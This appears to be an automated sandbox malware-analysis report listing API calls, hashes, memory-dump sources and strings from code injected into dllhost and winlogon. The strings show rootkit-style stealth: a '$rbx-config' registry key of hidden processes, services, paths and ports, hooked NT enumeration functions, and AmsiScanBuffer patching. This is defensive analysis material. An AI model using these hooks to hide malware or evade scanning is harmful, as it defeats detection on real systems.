Source File: 00000028.00000002.2693444553.000001C0401C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401C0000, based on PE: true

Associated: 00000028.00000002.2692656658.000001C0401C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2694394471.000001C0401D5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2695253023.000001C0401E0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2696077268.000001C0401E2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2696800295.000001C0401E9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1c0401c0000_dllhost.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
Instruction ID: 566bc1f2fa0b8e866033bc0e6a93b162eb2c6b11db4ccf9b18bfedb5aee947f1
Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
Instruction Fuzzy Hash: 4EE03931641604EAF719EB62D80878A3AE1EF8CF0AF448024CA0A07360EF7DD4998740

Function 0000000140001000 Relevance: 5.0, APIs: 4, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,00000000,000000014000154C), ref: 0000000140001006
HeapAlloc.KERNEL32(?,?,00000000,000000014000154C), ref: 0000000140001015
GetProcessHeap.KERNEL32(?,?,00000000,000000014000154C), ref: 0000000140001028
HeapAlloc.KERNEL32(?,?,00000000,000000014000154C), ref: 0000000140001037

Memory Dump Source

Source File: 00000028.00000002.2673229610.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000028.00000002.2672435865.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2674116081.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2674989251.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_140000000_dllhost.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 63251503df5c7392b59882377b05ff3c407c5ffe99838fad78ad3d93c79eabbc
Instruction ID: a4bc93d2c7b124559308cf7a4161fd93bc4ab92d57e3b019964b2e6119ad9c46
Opcode Fuzzy Hash: 63251503df5c7392b59882377b05ff3c407c5ffe99838fad78ad3d93c79eabbc
Instruction Fuzzy Hash: B7E0EDF1B5150086E709DB63E84439976A1FB9CB55F858024DA1907731DE3885D58654

Function 000001C0401F1000 Relevance: 5.0, APIs: 4, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001C0401F1006
HeapAlloc.KERNEL32 ref: 000001C0401F1015
GetProcessHeap.KERNEL32 ref: 000001C0401F1028
HeapAlloc.KERNEL32 ref: 000001C0401F1037

Memory Dump Source

Source File: 00000028.00000002.2698308226.000001C0401F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401F0000, based on PE: true

Associated: 00000028.00000002.2697542026.000001C0401F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2699174795.000001C040205000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2699989774.000001C040210000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2700970371.000001C040212000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2702383653.000001C040219000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1c0401f0000_dllhost.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
Instruction ID: d16cbd50d49141ba57d7da013736c6ae9b88f64d8ad4af548ca726a0fdb94126
Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
Instruction Fuzzy Hash: E0E0ED71651615DAF719EB62D9087AAB6A1FB8DB19F848024CB0907750EE3C84999610

Function 000001C0401C1000 Relevance: 5.0, APIs: 4, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001C0401C1006
HeapAlloc.KERNEL32 ref: 000001C0401C1015
GetProcessHeap.KERNEL32 ref: 000001C0401C1028
HeapAlloc.KERNEL32 ref: 000001C0401C1037

Memory Dump Source

Source File: 00000028.00000002.2693444553.000001C0401C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401C0000, based on PE: true

Associated: 00000028.00000002.2692656658.000001C0401C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2694394471.000001C0401D5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2695253023.000001C0401E0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2696077268.000001C0401E2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2696800295.000001C0401E9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1c0401c0000_dllhost.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
Instruction ID: 966dd0da08effb9f2da97d98c20cfe2ad8b377640ed9c19d1a34f79710ba0923
Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
Instruction Fuzzy Hash: 62E0ED71651504EAF719EB62D80479A7AA1FF8CF1AF448024CA0B07320EE3C94999610

Analysis Process: winlogon.exePID: 556, Parent PID: 2384COMMON

Execution Graph

Execution Coverage:	1.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	136
Total number of Limit Nodes:	17

Executed Functions

Function 000002E991752C80 Relevance: 13.6, APIs: 9, Instructions: 131
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

TlsGetValue.KERNEL32 ref: 000002E991752CAD
TlsGetValue.KERNEL32 ref: 000002E991752CBC
TlsGetValue.KERNEL32 ref: 000002E991752CCB
NtEnumerateValueKey.NTDLL ref: 000002E991752D40
NtEnumerateValueKey.NTDLL ref: 000002E991752D76
NtEnumerateValueKey.NTDLL ref: 000002E991752DB3
TlsSetValue.KERNEL32 ref: 000002E991752E0F
TlsSetValue.KERNEL32 ref: 000002E991752E1E
TlsSetValue.KERNEL32 ref: 000002E991752E2D

Memory Dump Source

Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true

Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd

Similarity

API ID: Value$Enumerate
String ID:
API String ID: 3520290360-0
Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
Instruction ID: 7084a0f37388f17c72d4b5abeb6984904817b407f2e493edf204947e4454237c
Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
Instruction Fuzzy Hash: 44519C36744682CBE765CB17E448A5AB3A4F788B84F52411EDE4A43B96DF38C8C5CF60

Function 000002E991751724 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 000002E99175172F
HeapAlloc.KERNEL32 ref: 000002E99175173E

Part of subcall function 000002E991751264: GetProcessHeap.KERNEL32 ref: 000002E99175126A
Part of subcall function 000002E991751264: HeapAlloc.KERNEL32 ref: 000002E991751279
Part of subcall function 000002E991751264: GetProcessHeap.KERNEL32 ref: 000002E991751293
Part of subcall function 000002E991751264: HeapAlloc.KERNEL32 ref: 000002E9917512A4

Part of subcall function 000002E991751000: GetProcessHeap.KERNEL32 ref: 000002E991751006
Part of subcall function 000002E991751000: HeapAlloc.KERNEL32 ref: 000002E991751015
Part of subcall function 000002E991751000: GetProcessHeap.KERNEL32 ref: 000002E991751028
Part of subcall function 000002E991751000: HeapAlloc.KERNEL32 ref: 000002E991751037

RegOpenKeyExW.KERNELBASE ref: 000002E9917517AE
RegOpenKeyExW.KERNELBASE ref: 000002E9917517DB
RegCloseKey.ADVAPI32 ref: 000002E9917517F5
RegOpenKeyExW.KERNELBASE ref: 000002E991751815
RegCloseKey.KERNELBASE ref: 000002E991751830
RegOpenKeyExW.KERNELBASE ref: 000002E991751850
RegCloseKey.ADVAPI32 ref: 000002E99175186B
RegOpenKeyExW.KERNELBASE ref: 000002E99175188B
RegCloseKey.ADVAPI32 ref: 000002E9917518A6
RegOpenKeyExW.KERNELBASE ref: 000002E9917518C6
RegCloseKey.ADVAPI32 ref: 000002E9917518E1
RegOpenKeyExW.KERNELBASE ref: 000002E991751901
RegCloseKey.ADVAPI32 ref: 000002E99175191C
RegOpenKeyExW.KERNELBASE ref: 000002E99175193C
RegCloseKey.ADVAPI32 ref: 000002E991751957
RegOpenKeyExW.KERNELBASE ref: 000002E991751977
RegCloseKey.ADVAPI32 ref: 000002E991751992
RegCloseKey.KERNELBASE ref: 000002E99175199C

Part of subcall function 000002E9917512B8: RegQueryInfoKeyW.ADVAPI32 ref: 000002E991751315
Part of subcall function 000002E9917512B8: GetProcessHeap.KERNEL32 ref: 000002E991751323
Part of subcall function 000002E9917512B8: HeapAlloc.KERNEL32 ref: 000002E991751334
Part of subcall function 000002E9917512B8: RegEnumValueW.ADVAPI32 ref: 000002E991751393
Part of subcall function 000002E9917512B8: GetProcessHeap.KERNEL32 ref: 000002E9917513DB
Part of subcall function 000002E9917512B8: HeapAlloc.KERNEL32 ref: 000002E9917513E9
Part of subcall function 000002E9917512B8: GetProcessHeap.KERNEL32 ref: 000002E991751406
Part of subcall function 000002E9917512B8: HeapFree.KERNEL32 ref: 000002E991751414
Part of subcall function 000002E9917512B8: lstrlenW.KERNEL32 ref: 000002E99175141D
Part of subcall function 000002E9917512B8: GetProcessHeap.KERNEL32 ref: 000002E99175142B
Part of subcall function 000002E9917512B8: HeapAlloc.KERNEL32 ref: 000002E991751439

Strings

udp, xrefs: 000002E991751970
tcp_remote, xrefs: 000002E991751935
service_names, xrefs: 000002E9917518BF
startup, xrefs: 000002E9917517D1
SOFTWARE\$rbx-config, xrefs: 000002E99175178E
process_names, xrefs: 000002E991751849
tcp_local, xrefs: 000002E9917518FA
paths, xrefs: 000002E991751884
pid, xrefs: 000002E99175180E

Memory Dump Source

Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true

Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd

Similarity

API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\$rbx-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 2135414181-3414887735
Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
Instruction ID: 0ab6ae7007cd32200ddd34f9a04970f5b3cbd55e20ea4a88b4426b03dcbe59b1
Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
Instruction Fuzzy Hash: 49712D26350A9285EB109F77E8586993364FB84BC9F42111BDD4E97B2ADF34C484DB50

Function 000002E991751E74 Relevance: 43.8, APIs: 8, Strings: 17, Instructions: 95
memorythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThread.KERNEL32 ref: 000002E991751E7F

Part of subcall function 000002E9917522A8: GetModuleHandleA.KERNEL32(?,?,?,000002E991751EB1), ref: 000002E9917522C0
Part of subcall function 000002E9917522A8: GetProcAddress.KERNEL32(?,?,?,000002E991751EB1), ref: 000002E9917522D1

CreateThread.KERNELBASE ref: 000002E991752043
TlsAlloc.KERNEL32 ref: 000002E991752049
TlsAlloc.KERNEL32 ref: 000002E991752055
TlsAlloc.KERNEL32 ref: 000002E991752061
TlsAlloc.KERNEL32 ref: 000002E99175206D
TlsAlloc.KERNEL32 ref: 000002E991752079
TlsAlloc.KERNEL32 ref: 000002E991752085

Strings

sechost.dll, xrefs: 000002E991751F99
advapi32.dll, xrefs: 000002E991751F57, 000002E991751F78
PdhGetRawCounterArrayW, xrefs: 000002E991751FD0
NtDeviceIoControlFile, xrefs: 000002E991751FB6
ntdll.dll, xrefs: 000002E991751E8D
PdhGetFormattedCounterArrayW, xrefs: 000002E991751FF1
AmsiScanBuffer, xrefs: 000002E991752012
NtQueryDirectoryFile, xrefs: 000002E991751EDF
NtQuerySystemInformation, xrefs: 000002E991751EA5
NtEnumerateValueKey, xrefs: 000002E991751F36
NtEnumerateKey, xrefs: 000002E991751F19
amsi.dll, xrefs: 000002E991752019
EnumServicesStatusExW, xrefs: 000002E991751F71, 000002E991751F92
EnumServiceGroupW, xrefs: 000002E991751F50
NtResumeThread, xrefs: 000002E991751EC2
NtQueryDirectoryFileEx, xrefs: 000002E991751EFC
pdh.dll, xrefs: 000002E991751FD7, 000002E991751FF8

Memory Dump Source

Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true

Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd

Similarity

API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
API String ID: 1735320900-4225371247
Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
Instruction ID: 76a0498010ae52e56ac533efc0b51d2484dcf11980dddfd0e30f021bb9a1078f
Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
Instruction Fuzzy Hash: CE51ADA4190ACBE6FB00DFA6EC4D7D43360B710394F82451B941A82567DF7882DACB72

Function 000002E99175EF88 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 140
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32(?,00000100,00000000,000002E99175F34A,?,?,00000000,000002E99175F2CD), ref: 000002E99175EFF5
GetLastError.KERNEL32(?,?,00000000,000002E99175F2CD), ref: 000002E99175F007
LoadLibraryExW.KERNEL32(?,?,00000000,000002E99175F2CD), ref: 000002E99175F049
VirtualProtect.KERNELBASE ref: 000002E99175F0A5
VirtualProtect.KERNEL32 ref: 000002E99175F0D6
FreeLibrary.KERNEL32(?,?,00000000,000002E99175F2CD), ref: 000002E99175F11A
GetProcAddress.KERNEL32(?,?,00000000,000002E99175F2CD), ref: 000002E99175F126

Strings

api-ms-, xrefs: 000002E99175F01B
AppPolicyGetProcessTerminationMethod, xrefs: 000002E99175F157, 000002E99175F165
ext-ms-, xrefs: 000002E99175F02E

Memory Dump Source

Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true

Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd

Similarity

API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
API String ID: 740688525-1880043860
Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
Instruction ID: d3b19a32b1d02c4b2adee47c79233e5846249729570d65564c58c69d92baebb5
Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
Instruction Fuzzy Hash: 4A51E42174178691FE559B67E8083A93390BB49BF0F5A0B2E9E3D473C2DF38C485CA61

Function 000002E991756270 Relevance: 9.2, APIs: 6, Instructions: 240
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.KERNEL32 ref: 000002E9917562AB
GetThreadContext.KERNEL32 ref: 000002E991756415

Part of subcall function 000002E9917560A0: GetCurrentThreadId.KERNEL32 ref: 000002E9917560A4

Memory Dump Source

Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true

Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: 06345c450f8296db91144f59c54cbd40b4799d269efc1b0e1a6bce112c420a70
Instruction ID: e8e1c5825070d25c47f8a2906e98e4307dfcee1d7df6d39934281bedaf282634
Opcode Fuzzy Hash: 06345c450f8296db91144f59c54cbd40b4799d269efc1b0e1a6bce112c420a70
Instruction Fuzzy Hash: B4D18E76248B8982DA70DB16E49835A77B4F3C8B88F51011AEACD47766DF3DC591CF10

Function 000002E991751E3C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 13
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 000002E991751E47
GetProcAddress.KERNEL32 ref: 000002E991751E57
SleepEx.KERNELBASE ref: 000002E991751E67

Strings

AmsiScanBuffer, xrefs: 000002E991751E50
amsi.dll, xrefs: 000002E991751E40

Memory Dump Source

Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true

Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd

Similarity

API ID: AddressLibraryLoadProcSleep
String ID: AmsiScanBuffer$amsi.dll
API String ID: 188063004-3248079830
Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
Instruction ID: 4de2bd28166c77eb20bda3f9c33f4c777e2e109d77ac18827b03cbf5d6d45b7a
Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
Instruction Fuzzy Hash: 62D067206916C2D5EA086B13E85C3543262BB68BC2FD6441FC50E852A6DF3D85D9AB72

Function 000002E991755810 Relevance: 7.8, APIs: 5, Instructions: 318
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.KERNEL32 ref: 000002E991755896

Memory Dump Source

Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true

Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: e54ed8d5981410d2d10d562d395602567931b9c6313d0845cabb15234d5347af
Instruction ID: 52951e6c7c0ac7a58361e99da30745c70ef6aa9fb656079d2de6e576f5462f06
Opcode Fuzzy Hash: e54ed8d5981410d2d10d562d395602567931b9c6313d0845cabb15234d5347af
Instruction Fuzzy Hash: C102D932259BC586EBA0CB56F49435AB7A0F3C5794F11411AEA8E87BA9DF7CC484CF10

Function 000002E991753EC8 Relevance: 7.5, APIs: 5, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,000002E991753A5B), ref: 000002E991753EDB
GetCurrentProcess.KERNEL32(?,?,?,?,?,000002E991753A5B), ref: 000002E991753F0E
VirtualProtectEx.KERNELBASE(?,?,?,?,?,000002E991753A5B), ref: 000002E991753F2E
GetCurrentProcess.KERNEL32(?,?,?,?,?,000002E991753A5B), ref: 000002E991753F47
VirtualProtectEx.KERNELBASE(?,?,?,?,?,000002E991753A5B), ref: 000002E991753F68

Memory Dump Source

Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true

Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID:
API String ID: 1092925422-0
Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
Instruction ID: dc7190347fc8dda5a5d134a6bec94dfc7c1510c5a7a9bf88f429bef67aba9473
Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
Instruction Fuzzy Hash: 2A11422674578293EB248B62E40821A67B0FB44BC0F05002BEE8D437A5EB7DC994CBA5

Function 000002E991722EBC Relevance: 6.2, APIs: 4, Instructions: 240memorylibraryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 000002E991722F7B
VirtualProtect.KERNELBASE ref: 000002E991722FA5
LoadLibraryA.KERNELBASE ref: 000002E99172302E
VirtualProtect.KERNELBASE ref: 000002E9917231C2

Memory Dump Source

Source File: 00000029.00000003.2213692370.000002E991720000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002E991720000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_3_2e991720000_winlogon.jbxd

Similarity

API ID: Virtual$Protect$AllocLibraryLoad
String ID:
API String ID: 3316853933-0
Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
Instruction ID: 51f8cee34b878b4538d56e3401ee481ec8ff1a74f599eb14aabb1b4cca860292
Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
Instruction Fuzzy Hash: 78915C727426D287EB608F26D404B7D73A1F748BA4F56852A9F4907789DA38D883CB30

Function 000002E991754120 Relevance: 4.6, APIs: 3, Instructions: 64
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualQuery.KERNEL32 ref: 000002E9917541A6
VirtualAlloc.KERNEL32 ref: 000002E9917541E0

Memory Dump Source

Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true

Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd

Similarity

API ID: Virtual$AllocQuery
String ID:
API String ID: 31662377-0
Opcode ID: a8802b86f0811ea88e9113a3d60b8cb8649c82089feb35d3c44dd7bdfe1e6621
Instruction ID: c949b42a060b6651e1e42dc03c64814b10480f49836834b788f6646c404d4bf6
Opcode Fuzzy Hash: a8802b86f0811ea88e9113a3d60b8cb8649c82089feb35d3c44dd7bdfe1e6621
Instruction Fuzzy Hash: 5B31522225DAC581EA32DB16E45831E62A4F3897C4F51052EF5CE46BAAEF3CC5C08F60

Function 000002E991753A1C Relevance: 4.5, APIs: 3, Instructions: 39
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32 ref: 000002E991753A35
PathFindFileNameW.SHLWAPI ref: 000002E991753A44

Part of subcall function 000002E991753F88: StrCmpNIW.SHLWAPI(?,?,?,000002E99175272F), ref: 000002E991753FA0

Part of subcall function 000002E991753EC8: GetModuleHandleW.KERNEL32(?,?,?,?,?,000002E991753A5B), ref: 000002E991753EDB
Part of subcall function 000002E991753EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,000002E991753A5B), ref: 000002E991753F0E
Part of subcall function 000002E991753EC8: VirtualProtectEx.KERNELBASE(?,?,?,?,?,000002E991753A5B), ref: 000002E991753F2E
Part of subcall function 000002E991753EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,000002E991753A5B), ref: 000002E991753F47
Part of subcall function 000002E991753EC8: VirtualProtectEx.KERNELBASE(?,?,?,?,?,000002E991753A5B), ref: 000002E991753F68

CreateThread.KERNELBASE ref: 000002E991753A8B

Part of subcall function 000002E991751E74: GetCurrentThread.KERNEL32 ref: 000002E991751E7F
Part of subcall function 000002E991751E74: CreateThread.KERNELBASE ref: 000002E991752043
Part of subcall function 000002E991751E74: TlsAlloc.KERNEL32 ref: 000002E991752049
Part of subcall function 000002E991751E74: TlsAlloc.KERNEL32 ref: 000002E991752055
Part of subcall function 000002E991751E74: TlsAlloc.KERNEL32 ref: 000002E991752061
Part of subcall function 000002E991751E74: TlsAlloc.KERNEL32 ref: 000002E99175206D
Part of subcall function 000002E991751E74: TlsAlloc.KERNEL32 ref: 000002E991752079
Part of subcall function 000002E991751E74: TlsAlloc.KERNEL32 ref: 000002E991752085

Memory Dump Source

